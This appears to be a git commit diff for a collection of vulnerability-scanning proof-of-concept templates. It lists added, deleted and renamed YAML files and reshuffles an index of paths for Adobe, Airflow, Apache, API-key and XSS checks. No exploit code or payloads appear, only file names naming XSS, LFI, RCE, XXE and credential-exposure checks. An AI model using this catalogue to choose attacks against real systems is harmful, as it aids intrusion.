delete mode 100644 poc/wordpress/wp-prostore-open-redirect-11546.yaml create mode 100644 poc/wordpress/wp-prostore-open-redirect-11550.yaml delete mode 100644 poc/wordpress/wp-qards-listing-11552.yaml create mode 100644 poc/wordpress/wp-qards-listing.yaml create mode 100644 poc/wordpress/wp-revslider-file-download-11554.yaml create mode 100644 poc/wordpress/wp-securimage-xss-11556.yaml delete mode 100644 poc/wordpress/wp-securimage-xss-11560.yaml rename poc/wordpress/{wp-sfwd-lms-listing-11562.yaml => wp-sfwd-lms-listing-11564.yaml} (100%) delete mode 100644 poc/wordpress/wp-simple-fields-lfi-11569.yaml delete mode 100644 poc/wordpress/wp-slideshow-xss-11572.yaml create mode 100644 poc/wordpress/wp-slideshow-xss-11574.yaml rename poc/wordpress/{wp-tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} (100%) create mode 100755 poc/wordpress/wp-vault-local-file-inclusion.yaml create mode 100644 poc/wordpress/wp-whmcs-xss-11614.yaml create mode 100644 poc/wordpress/wp-woocommerce-file-download-11620.yaml delete mode 100644 poc/wordpress/wp-woocommerce-file-download.yaml create mode 100644 poc/wordpress/wpdm-cache-session-11436.yaml delete mode 100644 poc/wordpress/wpdm-cache-session-11438.yaml delete mode 100644 poc/wordpress/wpengine-config-check.yaml create mode 100644 poc/wordpress/wptouch-open-redirect-11592.yaml create mode 100644 poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml delete mode 100644 poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml delete mode 100644 poc/xss/aem-setpreferences-xss.yaml rename poc/xss/{aem-xss-childlist-selector-197.yaml => aem-xss-childlist-selector-198.yaml} (100%) delete mode 100644 poc/xss/aem-xss-childlist-selector.yaml delete mode 100644 poc/xss/basic-xss-prober-698.yaml create mode 100644 poc/xss/coldfusion-debug-xss-1153.yaml delete mode 100644 poc/xss/coldfusion-debug-xss.yaml create mode 100644 poc/xss/concrete-xss-1178.yaml rename poc/xss/{concrete-xss-1177.yaml => concrete-xss.yaml} (100%) delete mode 100644 poc/xss/elex-woocommerce-xss-7199.yaml create mode 100644 poc/xss/elex-woocommerce-xss.yaml rename poc/xss/{empirecms-xss.yaml => empirecms-xss-7218.yaml} (100%) delete mode 100644 poc/xss/empirecms-xss-7220.yaml create mode 100644 poc/xss/feedwordpress-xss-7459.yaml create mode 100644 poc/xss/flow-flow-social-stream-xss-7524.yaml delete mode 100644 poc/xss/flow-flow-social-stream-xss.yaml delete mode 100644 poc/xss/kafdrop-xss-8411.yaml create mode 100644 poc/xss/laravel-ignition-xss.yaml create mode 100644 poc/xss/mida-eframework-xss.yaml delete mode 100644 poc/xss/moodle-filter-jmol-xss-8946.yaml delete mode 100644 poc/xss/moodle-xss-8950.yaml create mode 100644 poc/xss/oracle-ebs-xss-9373.yaml delete mode 100644 poc/xss/oracle-ebs-xss-9376.yaml create mode 100644 poc/xss/parentlink-xss-9467.yaml create mode 100644 poc/xss/parentlink-xss.yaml delete mode 100644 poc/xss/qcubed-xss-9749.yaml create mode 100644 poc/xss/qcubed-xss.yaml delete mode 100644 poc/xss/rockmongo-xss-9902.yaml rename poc/{other/nuclei_template.yaml => xss/rxss.yaml} (100%) create mode 100644 poc/xss/samsung-wlan-ap-xss-10012.yaml delete mode 100644 poc/xss/samsung-wlan-ap-xss.yaml create mode 100644 poc/xss/squirrelmail-add-xss-10515.yaml delete mode 100644 poc/xss/squirrelmail-add-xss.yaml create mode 100644 poc/xss/thruk-xss-10759.yaml create mode 100644 poc/xss/top-xss-params-10807.yaml delete mode 100644 poc/xss/top-xss-params-10809.yaml rename poc/xss/{wems-manager-xss.yaml => wems-manager-xss-11192.yaml} (100%) create mode 100644 poc/xss/window-name-domxss-11213.yaml delete mode 100644 poc/xss/window-name-domxss.yaml delete mode 100644 poc/xss/wordpress-wordfence-waf-bypass-xss-11356.yaml delete mode 100644 poc/xss/wordpress-zebra-form-xss-11378.yaml create mode 100644 poc/xss/wordpress-zebra-form-xss-11379.yaml create mode 100644 poc/xss/wp-ambience-xss-11407.yaml rename poc/xss/{wp-code-snippets-xss-11425.yaml => wp-code-snippets-xss.yaml} (100%) create mode 100644 poc/xss/wp-custom-tables-xss-11433.yaml delete mode 100644 poc/xss/wp-custom-tables-xss-11434.yaml delete mode 100644 poc/xss/wp-finder-xss-11445.yaml delete mode 100644 poc/xss/wp-knews-xss-11487.yaml create mode 100644 poc/xss/wp-knews-xss-11488.yaml delete mode 100644 poc/xss/wp-phpfreechat-xss-11524.yaml create mode 100644 poc/xss/wp-securimage-xss-11556.yaml delete mode 100644 poc/xss/wp-securimage-xss-11560.yaml delete mode 100644 poc/xss/wp-slideshow-xss-11572.yaml create mode 100644 poc/xss/wp-slideshow-xss-11574.yaml create mode 100644 poc/xss/wp-whmcs-xss-11614.yaml diff --git a/date.txt b/date.txt index ee1c5e1ee9..d0a507843a 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240608 +20240609 diff --git a/poc.txt b/poc.txt index ee26840479..7eddf04341 100644 --- a/poc.txt +++ b/poc.txt @@ -18,7 +18,6 @@ ./poc/adobe/adobe-coldfusion-detect-4.yaml ./poc/adobe/adobe-coldfusion-detect-5.yaml ./poc/adobe/adobe-coldfusion-detect-6.yaml -./poc/adobe/adobe-coldfusion-detect-82.yaml ./poc/adobe/adobe-coldfusion-detect-83.yaml ./poc/adobe/adobe-coldfusion-detect-84.yaml ./poc/adobe/adobe-coldfusion-detector-1.yaml @@ -29,29 +28,29 @@ ./poc/adobe/adobe-coldfusion-detector-6.yaml ./poc/adobe/adobe-coldfusion-detector-error.yaml ./poc/adobe/adobe-coldfusion-error-detect-85.yaml +./poc/adobe/adobe-coldfusion-error-detect-86.yaml ./poc/adobe/adobe-coldfusion-error-detect-87.yaml -./poc/adobe/adobe-coldfusion-error-detect-88.yaml +./poc/adobe/adobe-coldfusion-error-detect.yaml ./poc/adobe/adobe-component-login-1.yaml ./poc/adobe/adobe-component-login-2.yaml -./poc/adobe/adobe-component-login-90.yaml +./poc/adobe/adobe-component-login-89.yaml +./poc/adobe/adobe-component-login-91.yaml ./poc/adobe/adobe-component-login-92.yaml ./poc/adobe/adobe-component-login.yaml -./poc/adobe/adobe-connect-central-login-93.yaml ./poc/adobe/adobe-connect-central-login-94.yaml ./poc/adobe/adobe-connect-central-login-95.yaml +./poc/adobe/adobe-connect-central-login-96.yaml ./poc/adobe/adobe-connect-central-login-97.yaml ./poc/adobe/adobe-connect-central-login.yaml -./poc/adobe/adobe-connect-username-exposure-100.yaml ./poc/adobe/adobe-connect-username-exposure-101.yaml ./poc/adobe/adobe-connect-username-exposure-98.yaml ./poc/adobe/adobe-connect-username-exposure-99.yaml ./poc/adobe/adobe-connect-username-exposure.yaml -./poc/adobe/adobe-connect-version-102.yaml ./poc/adobe/adobe-connect-version-103.yaml -./poc/adobe/adobe-connect-version-104.yaml +./poc/adobe/adobe-connect-version.yaml ./poc/adobe/adobe-connect.yaml ./poc/adobe/adobe-cq5.yaml -./poc/adobe/adobe-experience-manager-login-105.yaml +./poc/adobe/adobe-experience-manager-login-106.yaml ./poc/adobe/adobe-experience-manager-login-107.yaml ./poc/adobe/adobe-experience-manager-login-108.yaml ./poc/adobe/adobe-experience-manager-login-109.yaml @@ -63,15 +62,15 @@ ./poc/adobe/adobe-media-server-110.yaml ./poc/adobe/adobe-media-server-111.yaml ./poc/adobe/adobe-media-server-113.yaml +./poc/adobe/adobe-media-server-114.yaml ./poc/adobe/adobe-media-server-115.yaml -./poc/adobe/adobe-media-server.yaml ./poc/adobe/adobe-phish.yaml ./poc/adobe/adobe-robohelp.yaml ./poc/adobe/adobe-secret.yaml ./poc/adobe/aem-acs-common.yaml ./poc/adobe/aem-bg-servlet-127.yaml ./poc/adobe/aem-bg-servlet-128.yaml -./poc/adobe/aem-bg-servlet-129.yaml +./poc/adobe/aem-bg-servlet.yaml ./poc/adobe/aem-cached-pages-131.yaml ./poc/adobe/aem-cached-pages.yaml ./poc/adobe/aem-cms-finder.yaml @@ -88,8 +87,8 @@ ./poc/adobe/aem-default-get-servlet-11.yaml ./poc/adobe/aem-default-get-servlet-12.yaml ./poc/adobe/aem-default-get-servlet-13.yaml +./poc/adobe/aem-default-get-servlet-135.yaml ./poc/adobe/aem-default-get-servlet-136.yaml -./poc/adobe/aem-default-get-servlet-137.yaml ./poc/adobe/aem-default-get-servlet-139.yaml ./poc/adobe/aem-default-get-servlet-14.yaml ./poc/adobe/aem-default-get-servlet-15.yaml @@ -143,7 +142,6 @@ ./poc/adobe/aem-default-get-servlet-8.yaml ./poc/adobe/aem-default-get-servlet-9.yaml ./poc/adobe/aem-default-get-servlet.yaml -./poc/adobe/aem-default-login-140.yaml ./poc/adobe/aem-default-login-141.yaml ./poc/adobe/aem-default-login-142.yaml ./poc/adobe/aem-detection-143.yaml @@ -156,12 +154,11 @@ ./poc/adobe/aem-fuzz.yaml ./poc/adobe/aem-gql-servlet-147.yaml ./poc/adobe/aem-gql-servlet-148.yaml -./poc/adobe/aem-gql-servlet-149.yaml +./poc/adobe/aem-gql-servlet-150.yaml ./poc/adobe/aem-gql-servlet.yaml ./poc/adobe/aem-groovyconsole-151.yaml ./poc/adobe/aem-groovyconsole-152.yaml ./poc/adobe/aem-groovyconsole-153.yaml -./poc/adobe/aem-groovyconsole-154.yaml ./poc/adobe/aem-groovyconsole-155.yaml ./poc/adobe/aem-groovyconsole-156.yaml ./poc/adobe/aem-hash-querybuilder-157.yaml @@ -169,18 +166,17 @@ ./poc/adobe/aem-hash-querybuilder-160.yaml ./poc/adobe/aem-hash-querybuilder-161.yaml ./poc/adobe/aem-hash-querybuilder.yaml -./poc/adobe/aem-jcr-querybuilder-162.yaml ./poc/adobe/aem-jcr-querybuilder-163.yaml ./poc/adobe/aem-jcr-querybuilder-164.yaml +./poc/adobe/aem-jcr-querybuilder-165.yaml ./poc/adobe/aem-jcr-querybuilder-166.yaml ./poc/adobe/aem-list-custom.yaml +./poc/adobe/aem-login-status-167.yaml ./poc/adobe/aem-login-status-168.yaml -./poc/adobe/aem-login-status-169.yaml ./poc/adobe/aem-login-status-170.yaml ./poc/adobe/aem-login-status-171.yaml ./poc/adobe/aem-merge-metadata-servlet-172.yaml ./poc/adobe/aem-merge-metadata-servlet-173.yaml -./poc/adobe/aem-merge-metadata-servlet-174.yaml ./poc/adobe/aem-misc-admin.yaml ./poc/adobe/aem-offloading-browser.yaml ./poc/adobe/aem-osgi-bundles.yaml @@ -188,7 +184,7 @@ ./poc/adobe/aem-querybuilder-feed-servlet-177.yaml ./poc/adobe/aem-querybuilder-internal-path-read-1.yaml ./poc/adobe/aem-querybuilder-internal-path-read-178.yaml -./poc/adobe/aem-querybuilder-internal-path-read-180.yaml +./poc/adobe/aem-querybuilder-internal-path-read-179.yaml ./poc/adobe/aem-querybuilder-internal-path-read-181.yaml ./poc/adobe/aem-querybuilder-internal-path-read-2.yaml ./poc/adobe/aem-querybuilder-internal-path-read-3.yaml @@ -199,20 +195,19 @@ ./poc/adobe/aem-querybuilder-json-servlet-184.yaml ./poc/adobe/aem-querybuilder-json-servlet-185.yaml ./poc/adobe/aem-querybuilder-json-servlet-187.yaml +./poc/adobe/aem-secrets.yaml ./poc/adobe/aem-security-users.yaml ./poc/adobe/aem-setpreferences-xss-189.yaml -./poc/adobe/aem-setpreferences-xss.yaml ./poc/adobe/aem-sling-login.yaml ./poc/adobe/aem-userinfo-servlet-190.yaml ./poc/adobe/aem-userinfo-servlet-191.yaml -./poc/adobe/aem-userinfo-servlet-192.yaml +./poc/adobe/aem-userinfo-servlet-193.yaml ./poc/adobe/aem-userinfo-servlet.yaml ./poc/adobe/aem-wcm-suggestions-servlet-194.yaml ./poc/adobe/aem-wcm-suggestions-servlet-195.yaml ./poc/adobe/aem-wcm-suggestions-servlet.yaml ./poc/adobe/aem-workflow.yaml -./poc/adobe/aem-xss-childlist-selector-197.yaml -./poc/adobe/aem-xss-childlist-selector.yaml +./poc/adobe/aem-xss-childlist-selector-198.yaml ./poc/adobe/aem.yaml ./poc/adobe/aem_misconfig.yaml ./poc/adobe/cached-aem-pages.yaml @@ -222,34 +217,34 @@ ./poc/adobe/libwww-perl-daemon.yaml ./poc/adobe/mdaemon-email-server.yaml ./poc/adobe/mjniohttpdaemon.yaml -./poc/adobe/possible-AEM-secrets.yaml ./poc/adobe/servudaemon-ini.yaml ./poc/adobe/vmware-authentication-daemon-detect.yaml ./poc/airflow/Airflow-Unauth.yaml ./poc/airflow/Airflow-unauthorized.yaml ./poc/airflow/airflow-api-exposure.yaml ./poc/airflow/airflow-configuration-exposure-229.yaml -./poc/airflow/airflow-configuration-exposure.yaml +./poc/airflow/airflow-configuration-exposure-230.yaml +./poc/airflow/airflow-debug-231.yaml ./poc/airflow/airflow-debug-232.yaml -./poc/airflow/airflow-debug-233.yaml ./poc/airflow/airflow-debug.yaml ./poc/airflow/airflow-default-credentials.yaml ./poc/airflow/airflow-default-login-235.yaml ./poc/airflow/airflow-default-login-236.yaml ./poc/airflow/airflow-detect-237.yaml ./poc/airflow/airflow-detect-238.yaml -./poc/airflow/airflow-detect-239.yaml +./poc/airflow/airflow-detect-240.yaml ./poc/airflow/airflow-exposure.yaml -./poc/airflow/airflow-panel-241.yaml +./poc/airflow/airflow-panel-242.yaml ./poc/airflow/airflow-panel-243.yaml +./poc/airflow/airflow-panel-244.yaml ./poc/airflow/airflow-panel-245.yaml ./poc/airflow/airflow-panel.yaml ./poc/airflow/airflow-unauth.yaml ./poc/airflow/airflow-unauth.yml ./poc/airflow/airflow-workflow.yaml ./poc/airflow/apache-airflow.yaml +./poc/airflow/unauthenticated-airflow-10884.yaml ./poc/airflow/unauthenticated-airflow-10885.yaml -./poc/airflow/unauthenticated-airflow-10886.yaml ./poc/airflow/unauthenticated-airflow-10887.yaml ./poc/airflow/unauthenticated-airflow.yaml ./poc/apache/APACHE-Ambari-weakPass.yaml @@ -272,20 +267,22 @@ ./poc/apache/apache-airflow.yaml ./poc/apache/apache-ambari-default-password.yml ./poc/apache/apache-ambari.yaml +./poc/apache/apache-answer-detect.yaml ./poc/apache/apache-apisix-dashboard.yaml ./poc/apache/apache-apisix-panel-336.yaml -./poc/apache/apache-apisix-panel-337.yaml +./poc/apache/apache-apisix-panel-338.yaml ./poc/apache/apache-apisix-panel.yaml ./poc/apache/apache-apisix.yaml ./poc/apache/apache-archiva.yaml ./poc/apache/apache-axis-detect-1.yaml ./poc/apache/apache-axis-detect-2.yaml ./poc/apache/apache-axis-detect-3.yaml +./poc/apache/apache-axis-detect-339.yaml ./poc/apache/apache-axis-detect-340.yaml -./poc/apache/apache-axis-detect.yaml +./poc/apache/apache-axis-detect-341.yaml ./poc/apache/apache-axis.yaml ./poc/apache/apache-axis2.yaml -./poc/apache/apache-cocoon-detect-342.yaml +./poc/apache/apache-cocoon-detect.yaml ./poc/apache/apache-cocoon.yaml ./poc/apache/apache-config-343.yaml ./poc/apache/apache-config-344.yaml @@ -294,10 +291,10 @@ ./poc/apache/apache-couchdb-unauth.yaml ./poc/apache/apache-couchdb.yaml ./poc/apache/apache-detect-345.yaml +./poc/apache/apache-detect-346.yaml ./poc/apache/apache-detect-347.yaml ./poc/apache/apache-detect-348.yaml ./poc/apache/apache-detect-349.yaml -./poc/apache/apache-detect.yaml ./poc/apache/apache-dir-listing.yaml ./poc/apache/apache-directory-exposure.yaml ./poc/apache/apache-drill-exposure.yaml @@ -314,7 +311,6 @@ ./poc/apache/apache-filename-brute-force-353.yaml ./poc/apache/apache-filename-brute-force.yaml ./poc/apache/apache-filename-enum.yaml -./poc/apache/apache-flink-unauth-rce-355.yaml ./poc/apache/apache-flink-unauth-rce-356.yaml ./poc/apache/apache-flink-unauth-rce-357.yaml ./poc/apache/apache-flink-unauth-rce-358.yaml @@ -335,7 +331,6 @@ ./poc/apache/apache-httpd-cve-2021-40438-ssrf.yml ./poc/apache/apache-httpd-cve-2021-41773-path-traversal.yml ./poc/apache/apache-httpd-cve-2021-41773-rce.yml -./poc/apache/apache-httpd-rce-362.yaml ./poc/apache/apache-httpd-rce-363.yaml ./poc/apache/apache-httpd-rce.yaml ./poc/apache/apache-impala.yaml @@ -366,10 +361,11 @@ ./poc/apache/apache-skywalking.yaml ./poc/apache/apache-solr-91-rce.yaml ./poc/apache/apache-solr-file-read-367.yaml -./poc/apache/apache-solr-file-read-369.yaml +./poc/apache/apache-solr-file-read-368.yaml ./poc/apache/apache-solr-file-read-370.yaml ./poc/apache/apache-solr-log4j-CVE-2021-44228.yaml ./poc/apache/apache-solr-log4j-cve-2021-44228.yaml +./poc/apache/apache-solr-log4j-rce-372.yaml ./poc/apache/apache-solr-log4j-rce.yaml ./poc/apache/apache-solr-rce.yaml ./poc/apache/apache-solr-remotestreaming-anyfileread.yaml @@ -404,7 +400,6 @@ ./poc/apache/default-apache-test-all-6812.yaml ./poc/apache/default-apache-test-all-6813.yaml ./poc/apache/default-apache-test-all-6814.yaml -./poc/apache/default-apache-test-all.yaml ./poc/apache/default-apache-test-page-6816.yaml ./poc/apache/default-apache-test-page-6817.yaml ./poc/apache/default-apache-test-page-6818.yaml @@ -417,7 +412,6 @@ ./poc/apache/default-apache2-ubuntu-page-6809.yaml ./poc/apache/default-apache2-ubuntu-page-6810.yaml ./poc/apache/default-apache2-ubuntu-page-6811.yaml -./poc/apache/default-apache2-ubuntu-page.yaml ./poc/api/ApacheNifi-Api-UnauthorizedAccess.yaml ./poc/api/Discuz-info-api.yaml ./poc/api/Google-api.yaml @@ -445,83 +439,81 @@ ./poc/api/alfacgiapi-wordpress-257.yaml ./poc/api/alfacgiapi-wordpress-3.yaml ./poc/api/alfacgiapi-wordpress-4.yaml -./poc/api/alfacgiapi-wordpress.yaml ./poc/api/apache-apisix-dashboard.yaml ./poc/api/apache-apisix-panel-336.yaml -./poc/api/apache-apisix-panel-337.yaml +./poc/api/apache-apisix-panel-338.yaml ./poc/api/apache-apisix-panel.yaml ./poc/api/apache-apisix.yaml ./poc/api/apache-nifi-api-unauthorized-access.yml +./poc/api/api-abstractapi-383.yaml ./poc/api/api-abstractapi.yaml -./poc/api/api-abuseipdb-384.yaml -./poc/api/api-accuweather-386.yaml -./poc/api/api-adafruit-io-387.yaml +./poc/api/api-abuseipdb-385.yaml +./poc/api/api-abuseipdb.yaml +./poc/api/api-accuweather.yaml +./poc/api/api-adafruit-io.yaml ./poc/api/api-aletheia.yaml -./poc/api/api-alienvault-388.yaml ./poc/api/api-alienvault-389.yaml ./poc/api/api-alienvault-390.yaml -./poc/api/api-apigee-edge-391.yaml -./poc/api/api-appveyor-392.yaml +./poc/api/api-apigee-edge.yaml +./poc/api/api-appveyor.yaml ./poc/api/api-asana-393.yaml ./poc/api/api-aviationstack.yaml ./poc/api/api-bearer-auth-a2f3021256bf5d76bbaeaff6f05d43fd.yaml ./poc/api/api-bearer-auth.yaml -./poc/api/api-bible.yaml +./poc/api/api-bible-394.yaml ./poc/api/api-bing-map-2018-bdd86a2dc395718687e612b89b6cd720.yaml ./poc/api/api-bing-map-2018.yaml ./poc/api/api-bingmaps-395.yaml -./poc/api/api-bingmaps.yaml ./poc/api/api-bitly-396.yaml -./poc/api/api-bitrise.yaml -./poc/api/api-block-400.yaml +./poc/api/api-bitrise-397.yaml +./poc/api/api-block.yaml ./poc/api/api-blockchain-399.yaml -./poc/api/api-blockchain.yaml ./poc/api/api-bravenewcoin.yaml ./poc/api/api-breezometer.yaml ./poc/api/api-buildkite-402.yaml -./poc/api/api-buildkite.yaml ./poc/api/api-buttercms-403.yaml ./poc/api/api-calendly-404.yaml ./poc/api/api-carboninterface.yaml ./poc/api/api-circleci-405.yaml ./poc/api/api-circleci-406.yaml -./poc/api/api-circleci.yaml ./poc/api/api-clearbit.yaml ./poc/api/api-climatiq.yaml ./poc/api/api-cloudmersive.yaml -./poc/api/api-coinapi-408.yaml +./poc/api/api-coinapi.yaml ./poc/api/api-cooperhewitt-410.yaml ./poc/api/api-cooperhewitt-411.yaml ./poc/api/api-covalent.yaml ./poc/api/api-dbt.yaml -./poc/api/api-debounce-414.yaml -./poc/api/api-deviantart.yaml +./poc/api/api-debounce.yaml +./poc/api/api-deviantart-415.yaml ./poc/api/api-dribbble-416.yaml -./poc/api/api-dribbble.yaml +./poc/api/api-dribbble-417.yaml ./poc/api/api-dropbox-418.yaml ./poc/api/api-endpoints.yaml ./poc/api/api-europeana-419.yaml +./poc/api/api-europeana-420.yaml ./poc/api/api-europeana-421.yaml ./poc/api/api-facebook-422.yaml -./poc/api/api-fastly.yml -./poc/api/api-festivo.yaml +./poc/api/api-fastly-424.yaml +./poc/api/api-fastly.yaml +./poc/api/api-festivo-425.yaml ./poc/api/api-fixer.yaml ./poc/api/api-fontawesome-426.yaml ./poc/api/api-fortitoken-cloud.yaml ./poc/api/api-front.yaml -./poc/api/api-fullhunt-428.yaml +./poc/api/api-fullhunt.yaml ./poc/api/api-github.yaml ./poc/api/api-gitlab-430.yaml ./poc/api/api-gitlab.yml -./poc/api/api-google-drive.yaml +./poc/api/api-google-drive-432.yaml ./poc/api/api-harvardart-434.yaml ./poc/api/api-harvardart.yaml ./poc/api/api-heroku.yaml -./poc/api/api-hirak-rates-436.yaml +./poc/api/api-hirak-rates.yaml ./poc/api/api-hubspot-437.yaml -./poc/api/api-hubspot.yaml ./poc/api/api-iconfinder-438.yaml -./poc/api/api-improvmx-440.yaml +./poc/api/api-iconfinder-439.yaml +./poc/api/api-improvmx.yaml ./poc/api/api-info-themes-plugins-wp-org-66caa0b56de1f5b395ccb9edd74d127d.yaml ./poc/api/api-info-themes-plugins-wp-org-a5ba91db466ae424f41944b08096d121.yaml ./poc/api/api-info-themes-plugins-wp-org-b2b4c6858b9f9bf1ce417b44adf44c1b.yaml @@ -530,13 +522,13 @@ ./poc/api/api-info-themes-plugins-wp-org-plugin.yaml ./poc/api/api-info-themes-plugins-wp-org.yaml ./poc/api/api-instagram.yaml -./poc/api/api-instatus-442.yaml -./poc/api/api-intercom.yaml +./poc/api/api-instatus.yaml +./poc/api/api-intercom-443.yaml ./poc/api/api-ipapi.yaml -./poc/api/api-ipstack.yaml +./poc/api/api-ipstack-444.yaml ./poc/api/api-iqair.yaml -./poc/api/api-iterable.yaml -./poc/api/api-jumpcloud.yaml +./poc/api/api-iterable-445.yaml +./poc/api/api-jumpcloud-446.yaml ./poc/api/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml ./poc/api/api-key-for-google-maps.yaml ./poc/api/api-keys.yaml @@ -545,83 +537,75 @@ ./poc/api/api-leanix.yaml ./poc/api/api-linkedin.yaml ./poc/api/api-linkfinder.yaml -./poc/api/api-lokalise-452.yaml +./poc/api/api-lokalise.yaml ./poc/api/api-loqate-453.yaml -./poc/api/api-mailchimp-454.yaml ./poc/api/api-mailchimp.yaml ./poc/api/api-mailgun-455.yaml ./poc/api/api-malshare-456.yaml -./poc/api/api-malwarebazaar-458.yaml +./poc/api/api-malshare.yaml ./poc/api/api-malwarebazaar-459.yaml ./poc/api/api-mapbox-465.yaml -./poc/api/api-mapbox.yaml ./poc/api/api-marketstack.yaml ./poc/api/api-mediastack.yaml -./poc/api/api-mojoauth-466.yaml +./poc/api/api-mojoauth.yaml ./poc/api/api-mywot-467.yaml -./poc/api/api-mywot-468.yaml ./poc/api/api-nerdgraph-469.yaml ./poc/api/api-nerdgraph.yaml -./poc/api/api-netlify-470.yaml +./poc/api/api-netlify.yaml ./poc/api/api-npm-471.yaml ./poc/api/api-npm.yaml ./poc/api/api-onelogin.yaml ./poc/api/api-openweather-473.yaml -./poc/api/api-openweather.yaml ./poc/api/api-optimizely-474.yaml -./poc/api/api-pagerduty.yaml +./poc/api/api-pagerduty-475.yaml ./poc/api/api-particle.yaml ./poc/api/api-pastebin-477.yaml ./poc/api/api-paypal-478.yaml ./poc/api/api-pendo-479.yaml -./poc/api/api-petfinder.yaml +./poc/api/api-pendo.yaml +./poc/api/api-petfinder-480.yaml ./poc/api/api-pinata-481.yaml -./poc/api/api-pivotaltracker.yaml +./poc/api/api-pivotaltracker-482.yaml ./poc/api/api-positionstack.yaml -./poc/api/api-postmark-483.yaml ./poc/api/api-postmark.yaml ./poc/api/api-quip-484.yaml ./poc/api/api-rate-limit-exceeded.yaml ./poc/api/api-reviewapi.yaml ./poc/api/api-rijksmuseum-485.yaml -./poc/api/api-rijksmuseum.yaml ./poc/api/api-scanii-487.yaml +./poc/api/api-scanii-488.yaml ./poc/api/api-screenshotlayer.yaml ./poc/api/api-seatgeek.yaml -./poc/api/api-sendgrid-489.yaml ./poc/api/api-sendgrid.yaml -./poc/api/api-slack-493.yaml +./poc/api/api-slack.yaml ./poc/api/api-sonarcloud-494.yaml +./poc/api/api-sonarcloud.yaml ./poc/api/api-sportdataapi.yaml -./poc/api/api-spotify-495.yaml -./poc/api/api-square-496.yaml -./poc/api/api-sslmate-497.yaml +./poc/api/api-spotify.yaml +./poc/api/api-square.yaml +./poc/api/api-sslmate.yaml ./poc/api/api-strava-498.yaml -./poc/api/api-stripe-499.yaml ./poc/api/api-stripe.yaml ./poc/api/api-stytch.yaml -./poc/api/api-taiga-501.yaml -./poc/api/api-thecatapi-502.yaml +./poc/api/api-taiga.yaml ./poc/api/api-thecatapi-503.yaml -./poc/api/api-tink-504.yaml +./poc/api/api-tink.yaml ./poc/api/api-tinypng-505.yaml ./poc/api/api-travisci-506.yaml -./poc/api/api-travisci.yaml ./poc/api/api-twitter.yaml ./poc/api/api-urlscan-508.yaml ./poc/api/api-users-exposed.yaml ./poc/api/api-vercel.yaml ./poc/api/api-virustotal-511.yaml ./poc/api/api-virustotal-512.yaml -./poc/api/api-visualstudio-513.yaml +./poc/api/api-visualstudio.yaml ./poc/api/api-wakatime-514.yaml +./poc/api/api-wakatime.yaml ./poc/api/api-weatherstack.yaml ./poc/api/api-webex-515.yaml -./poc/api/api-weglot-516.yaml ./poc/api/api-weglot.yaml -./poc/api/api-wordcloud-517.yaml ./poc/api/api-wordcloud-518.yaml -./poc/api/api-youtube-519.yaml +./poc/api/api-youtube.yaml ./poc/api/api-zenserp.yaml ./poc/api/api-zipcodebase.yaml ./poc/api/api2cart-bridge-connector-7f28d21ce1d1423f08ff3303e97fdcda.yaml @@ -633,7 +617,6 @@ ./poc/api/apilayer-caddy.yaml ./poc/api/apiman-panel-460.yaml ./poc/api/apiman-panel-461.yaml -./poc/api/apiman-panel-462.yaml ./poc/api/apiman-panel-463.yaml ./poc/api/apisix-default-login-491.yaml ./poc/api/apisix-default-login-492.yaml @@ -649,12 +632,10 @@ ./poc/api/beamer-api-token.yaml ./poc/api/bems-api-lfi-707.yaml ./poc/api/bems-api-lfi-708.yaml -./poc/api/bems-api-lfi-709.yaml ./poc/api/bems-api-lfi-710.yaml ./poc/api/bems-api-lfi-711.yaml -./poc/api/bems-api-lfi-712.yaml ./poc/api/burp-api-detect-809.yaml -./poc/api/burp-api-detect-812.yaml +./poc/api/burp-api-detect-810.yaml ./poc/api/burp-api-detect-813.yaml ./poc/api/burp-api-detect.yaml ./poc/api/cart-rest-api-for-woocommerce-863e46252f4619353ac6e316726d18cc.yaml @@ -731,6 +712,7 @@ ./poc/api/fastapi-3.yaml ./poc/api/fastapi-4.yaml ./poc/api/fastapi-5.yaml +./poc/api/fastapi-docs-7398.yaml ./poc/api/fastapi-docs-7399.yaml ./poc/api/fastapi-docs.yaml ./poc/api/fastly-api-token.yaml @@ -752,7 +734,6 @@ ./poc/api/gitlab-user-open-api-7703.yaml ./poc/api/gitlab-user-open-api.yaml ./poc/api/gmail-api-client-secrets-7740.yaml -./poc/api/gmail-api-client-secrets-7741.yaml ./poc/api/gmail-api-client-secrets.yaml ./poc/api/goSwaggerAPI.yaml ./poc/api/google-api(1).yaml @@ -768,13 +749,13 @@ ./poc/api/grafana-api-key-exposure.yaml ./poc/api/grafana_with_prometheus_api_proxy.yaml ./poc/api/graphql-apiforwp-detect.yaml +./poc/api/graylog-api-browser-7846.yaml ./poc/api/graylog-api-browser-7847.yaml ./poc/api/graylog-api-browser-7848.yaml -./poc/api/graylog-api-browser.yaml ./poc/api/hidden-api-endpoint-discovery.yaml ./poc/api/hidden-api-key-exposure.yaml -./poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/api/http-etcd-unauthenticated-api-data-leak-8057.yaml +./poc/api/http-etcd-unauthenticated-api-data-leak.yaml ./poc/api/iis-enum-httpapi.yaml ./poc/api/jenkins-api-panel-8261.yaml ./poc/api/jenkins-api-panel-8262.yaml @@ -796,12 +777,12 @@ ./poc/api/k8s-apiserver-unauthorized.yaml ./poc/api/kube-api-deployments-8503.yaml ./poc/api/kube-api-deployments-8504.yaml +./poc/api/kube-api-namespaces-8505.yaml ./poc/api/kube-api-namespaces-8506.yaml ./poc/api/kube-api-nodes-8507.yaml -./poc/api/kube-api-nodes-8508.yaml -./poc/api/kube-api-nodes.yaml ./poc/api/kube-api-pods-8509.yaml ./poc/api/kube-api-pods-8510.yaml +./poc/api/kube-api-pods.yaml ./poc/api/kube-api-roles.yaml ./poc/api/kube-api-scan.yaml ./poc/api/kube-api-secrets-8511.yaml @@ -815,15 +796,15 @@ ./poc/api/magento-2-exposed-api-2.yaml ./poc/api/magento-2-exposed-api-3.yaml ./poc/api/magento-2-exposed-api-8687.yaml +./poc/api/magento-2-exposed-api-8688.yaml ./poc/api/magento-2-exposed-api-8689.yaml ./poc/api/mailchimp-api-11854.yaml ./poc/api/mailchimp-api-key-8722.yaml ./poc/api/mailchimp-api-key-8723.yaml ./poc/api/mailchimp-api-key-8724.yaml -./poc/api/mailchimp-api-key-8726.yaml ./poc/api/mailchimp-api-key.yaml 